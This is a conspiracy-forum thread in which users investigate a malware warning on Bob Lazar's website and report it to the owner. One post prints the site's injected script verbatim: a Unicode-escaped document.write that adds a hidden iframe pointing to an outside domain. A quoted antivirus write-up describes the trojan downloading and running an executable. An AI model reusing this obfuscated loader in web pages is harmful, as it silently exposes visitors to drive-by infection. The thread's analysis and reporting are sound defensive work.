It looks like you're using an Ad Blocker.
Please white-list or disable AboveTopSecret.com in your ad-blocking tool.
Thank you.
Some features of ATS will be disabled while you continue to use an ad-blocker.
I just went to Bob Lazar's site and got a virus...
page: 11
share:
I went to his site boblazar.com just to check if the password still didn't work. Well you don't need a password anymore, but my virus scanner
started popping up with infected files from the site.
Do you think it's the owners of the site that installed a script or exploit on the site or is it some kind of government spyware or cookie or something tracking people who look into the subject?
Do you think it's the owners of the site that installed a script or exploit on the site or is it some kind of government spyware or cookie or something tracking people who look into the subject?
reply to post by Diplomat
Hmmm, I'm not game enough to go there to check! Perhaps one of the techs or IT members here could check it out and post a response?
Hmmm, I'm not game enough to go there to check! Perhaps one of the techs or IT members here could check it out and post a response?
Trojan-Downloader.JS.Psyme.gy
www.viruslist.com...
The virus is downloaded once you open this page
http : // www. boblazar. com/ closed/ index. html
I took a look at the source code:
The issue is this one:
< script type ="text/_javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u007 4\u0070\u003a\u002f\u002f\u0074\u006f\u0070\u0031\u0030\u0030\u002d\u0063\u006f\u0075\u006e\u0074\u0065\u0072\u002e\u0063\u006f\ u006d\u002f\u0074\u006f\u0070\u0031\u0030\u0030\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0022\u0020\u0073\u00 74\u0079\u006c\u0065\u003d\u0022\u0076\u0069\u0073\u0069\u0062\u0069\u006c\u0069\u0074\u0079\u003a\u0020\u0068\u0069\u0064\u0064 u0065\u006e\u003b\u0020\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u0020\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0 069\u0066\u0072\u0061\u006d\u0065\u003e\u0020')
< / script >
This is an iframe encoded tag: with the iframe
tag, you can embed a page in another one, even from another website.
But it may happen that a webmaster ( a HECK of a webmaster ) is unaware of it.
Now, changin the "document.write" instruction to "alert" this is the result:
If you click here Google result
then you get this result:
If i'm correct, there are some web page generators which embed automatically the malicious code in the pages that they build.
See also:
Massive Web Server Hacks (”iFrame Attacks”) - Now Extended To TYPO3
I've sent an email to a friend in order to bring the issue to Bob Lazar's attention.
Thanks for sharing this information, diplomat.
[edit on 10/4/2008 by internos]
Technical details
This Trojan downloads other programs via the Internet and launches them on the victim machine without the user’s
knowledge or consent. The Trojan is a Java Script script which is built in to HTML pages.
It is 17,002 bytes in size.
Payload
Once launched, the Trojan injects its code into the memory of processes which have the following unique identifiers
in the system registry:
[BD96C556-65A3-11D0-983A-00C04FC29E30]
[BD96C556-65A3-11D0-983A-00C04FC29E36]
[AB9BCEDD-EC7E-47E1-9322-D4A210617116]
[0006F033-0000-0000-C000-000000000046]
[0006F03A-0000-0000-C000-000000000046]
[6e32070a-766d-4ee6-879c-dc1fa91d2fc3]
[6414512B-B978-451D-A0D8-FCFDF33E833C]
[7F5B7F63-F06F-4331-8A26-339E03C0AE3D]
[06723E09-F4C2-43c8-8358-09FCD1DB0766]
[639F725F-1B2D-4831-A9FD-874847682010]
[BA018599-1DB3-44f9-83B4-461454C84BF8]
[D0C07D56-7C69-43F1-B4A0-25F5A11FAB19]
[E8CCCDDF-CA28-496b-B050-6C07C962476B]
The Trojan then attempts to connect to the Internet and download a file called "file.php" from the following
address:
my...***l.com/file.pho
(At the time of writing, this link was not working.)
This file will be saved to the C: \ root directory as "sys%rnd%.exe (%rnd% is a random four digit number):
c:\sys%rnd%.exe
The downloaded file is then launched for execution.
Removal instructions
If your computer does not have an up-to-date antivirus, or does not have an antivirus solution at all, follow the
instructions below to delete the malicious program:
Delete the original Trojan file (the location will depend on how the program originally penetrated the victim machine).
Delete the following file:
c:\sys%rnd%.exe
Update your antivirus databases and perform a full scan of the computer
www.viruslist.com...
The virus is downloaded once you open this page
http : // www. boblazar. com/ closed/ index. html
I took a look at the source code:
The issue is this one:
< script type ="text/_javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u007 4\u0070\u003a\u002f\u002f\u0074\u006f\u0070\u0031\u0030\u0030\u002d\u0063\u006f\u0075\u006e\u0074\u0065\u0072\u002e\u0063\u006f\ u006d\u002f\u0074\u006f\u0070\u0031\u0030\u0030\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0022\u0020\u0073\u00 74\u0079\u006c\u0065\u003d\u0022\u0076\u0069\u0073\u0069\u0062\u0069\u006c\u0069\u0074\u0079\u003a\u0020\u0068\u0069\u0064\u0064 u0065\u006e\u003b\u0020\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u0020\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0 069\u0066\u0072\u0061\u006d\u0065\u003e\u0020')
< / script >
This is an iframe encoded tag: with the iframe
tag, you can embed a page in another one, even from another website.
But it may happen that a webmaster ( a HECK of a webmaster ) is unaware of it.
Now, changin the "document.write" instruction to "alert" this is the result:
If you click here Google result
then you get this result:
If i'm correct, there are some web page generators which embed automatically the malicious code in the pages that they build.
See also:
Massive Web Server Hacks (”iFrame Attacks”) - Now Extended To TYPO3
I've sent an email to a friend in order to bring the issue to Bob Lazar's attention.
Thanks for sharing this information, diplomat.
[edit on 10/4/2008 by internos]
new topics
-
Former Labour minister Frank Field dies aged 81
People: 20 minutes ago -
SETI chief says US has no evidence for alien technology. 'And we never have'
Aliens and UFOs: 2 hours ago -
This is our Story
General Entertainment: 4 hours ago -
President BIDEN Vows to Make Americans Pay More Federal Taxes in 2025 - Political Suicide.
2024 Elections: 6 hours ago -
Ode to Artemis
General Chit Chat: 7 hours ago -
Ditching physical money
History: 11 hours ago -
One Flame Throwing Robot Dog for Christmas Please!
Weaponry: 11 hours ago -
Don't take advantage of people just because it seems easy it will backfire
Rant: 11 hours ago
top topics
-
University student disciplined after saying veganism is wrong and gender fluidity is stupid
Education and Media: 15 hours ago, 14 flags -
President BIDEN Vows to Make Americans Pay More Federal Taxes in 2025 - Political Suicide.
2024 Elections: 6 hours ago, 10 flags -
One Flame Throwing Robot Dog for Christmas Please!
Weaponry: 11 hours ago, 6 flags -
Should Biden Replace Harris With AOC On the 2024 Democrat Ticket?
2024 Elections: 13 hours ago, 6 flags -
Don't take advantage of people just because it seems easy it will backfire
Rant: 11 hours ago, 4 flags -
Ditching physical money
History: 11 hours ago, 4 flags -
SETI chief says US has no evidence for alien technology. 'And we never have'
Aliens and UFOs: 2 hours ago, 3 flags -
God lived as a Devil Dog.
Short Stories: 16 hours ago, 3 flags -
Ode to Artemis
General Chit Chat: 7 hours ago, 2 flags -
VirginOfGrand says hello
Introductions: 12 hours ago, 2 flags
1